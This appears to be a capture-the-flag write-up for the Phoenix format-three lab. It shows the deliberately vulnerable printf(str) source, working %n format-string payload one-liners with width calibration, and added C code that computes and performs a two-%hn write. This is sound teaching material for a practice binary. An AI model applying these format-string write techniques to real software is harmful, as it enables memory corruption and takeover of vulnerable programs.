/*
 * phoenix/format-three, by https://exploit.education
 *
 * Can you change the "changeme" variable to a precise value?
 *
 * How do you fix a cracked pumpkin? With a pumpkin patch.
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* LEVELNAME is supplied by the build, not defined in this file. */
#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int changeme;

void bounce(char *str) {
  /* The bug: user input is used as the format string, so %p reads stack
   * slots and %n writes a byte count through whatever pointer the next
   * argument slot happens to hold. */
  printf(str);
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  /* read() does not NUL-terminate buf; the payload is passed on as-is. */
  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);

  if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }

  exit(0);
}
- Similar to the previous level, first find the address of changeme:
  objdump -t /opt/phoenix/amd64/format-three | grep changeme
  gives an address whose bytes are \x60\x0a\x90. That is awkward to deliver,
  because \x0a is '\n' and a newline would sit in the middle of the address,
  so the i486 build is used instead:
  objdump -t /opt/phoenix/i486/format-three | grep changeme
  gives \x08\x04\x98\x44, i.e. changeme lives at 0x08049844. On i486 the
  address goes into the payload little-endian, as \x44\x98\x04\x08.
- We need to overwrite changeme with the specific value 0x64457845. The %n
  specifier still does the job: it writes the number of bytes printed so far
  into the int whose address sits in the next argument slot. The buffer is
  far too small to hold 0x64457845 bytes of padding, so a width specifier on
  one of the conversions is used to make printf emit that many bytes itself.
  0x64457845 is 1682274373 in decimal:
  python -c 'print("\x44\x98\x04\x08 %p %p %p %1682274373s %p %p %p %p %p %p %p %n")' | /opt/phoenix/i486/format-three
  The eleven %p conversions consume stack slots until the %n's argument is
  the start of buf, where the address bytes are. This first attempt lands
  too high by 74 bytes (the two widths below differ by exactly that): the
  four address bytes, the spaces and the pointers printed by the %p
  conversions all count towards the total. The "got 0x..." value the
  binary prints gives the exact overshoot, so subtract that difference from
  the width:
  python -c 'print("\x44\x98\x04\x08 %p %p %p %1682274299s %p %p %p %p %p %p %p %n")' | /opt/phoenix/i486/format-three
  solves the challenge. This must be Python 2: its print writes the \x..
  escapes as raw bytes, whereas Python 3 would UTF-8 encode \x98 into two
  bytes and shift the address. The trailing newline print appends comes
  after the %n, so it does not affect the count.
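The write above pushes the byte counter all the way to 0x64457845, which means printf actually emits about 1.6 GB of padding. The same %n primitive can do the job with two short writes (%hn) instead, each needing at most 65535 bytes of padding, because %hn only stores the low 16 bits of the counter and the counter wraps for the second half. The block below is an added example written for this writeup, not part of the phoenix challenge or its solution: it reproduces the width arithmetic for both the single-%n approach and the two-%hn approach, and performs the %hn write against a stand-in changeme. The target pointers and widths are passed as real fprintf arguments (in the challenge they would be bytes inside buf), the "prefix" string is a constructed stand-in for the address bytes and %p output that precede the write, and a little-endian layout is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the challenge's global; the test reads it back after the write. */
int changeme;

/* Width for the writeup's single-%n approach: the target count minus the
 * bytes already emitted before the %n. Returns -1 when the prefix alone
 * already exceeds the target, since a width can only add bytes. */
long n_width(unsigned long printed, unsigned long target) {
    return target < printed ? -1 : (long)(target - printed);
}

/* Width that moves the running byte count from 'printed' to 'target'
 * modulo 2^16, which is all a %hn (short write) looks at. The wrap lets the
 * second half be smaller than the first without going "backwards". */
int hn_width(unsigned printed, unsigned target) {
    return (int)((target - printed) & 0xffffu);
}

/* Writes 'value' into *dst with two %hn conversions: low 16 bits at dst,
 * high 16 bits at dst + 2 (assumes little-endian, as on the i486 target).
 * 'prefix' stands in for the address bytes and %p output that precede the
 * write in the real payload. Output goes to /dev/null; returns the total
 * byte count reported by a trailing %n, or -1 if the sink cannot be opened. */
long write_u32_via_hn(uint32_t *dst, uint32_t value, const char *prefix) {
    FILE *sink = fopen("/dev/null", "w");
    if (sink == NULL)
        return -1;

    short *lo = (short *)dst;   /* bytes 0-1 of the int */
    short *hi = lo + 1;         /* bytes 2-3 of the int */
    unsigned lo_val = value & 0xffffu;
    unsigned hi_val = value >> 16;

    int w1 = hn_width((unsigned)strlen(prefix), lo_val);  /* prefix -> low half */
    int w2 = hn_width(lo_val, hi_val);                    /* low half -> high half */
    int total = 0;

    /* In the challenge these widths and pointers would be bytes inside buf;
     * here they are ordinary arguments, so the call is well-defined. */
    fprintf(sink, "%s%*s%hn%*s%hn%n", prefix, w1, "", lo, w2, "", hi, &total);
    fclose(sink);
    return total;
}

int main(void) {
    /* Constructed prefix: the little-endian address followed by a few
     * plausible %p dumps, mimicking the start of the writeup's payload. */
    const char *prefix = "\x44\x98\x04\x08 0xffffd5c4 0x0 0xf7ffda28 ";
    long total = write_u32_via_hn((uint32_t *)&changeme, 0x64457845u, prefix);

    printf("bytes counted: %ld, changeme = 0x%08x\n", total, changeme);
    printf("single-%%n width with no prefix: %ld\n", n_width(0, 0x64457845ul));
    printf("single-%%n width after 74 prefix bytes: %ld\n", n_width(74, 0x64457845ul));
    return changeme == 0x64457845 ? 0 : 1;
}
```

The two-write variant only touches 16 bits per %hn, so the order matters: write the low half first at the lower address, then let the counter wrap around to the high half. Against the real binary the widths would still have to be calibrated from the "got 0x..." output, exactly as the writeup does for the single %n, because the bytes printed by the %p conversions depend on the stack contents.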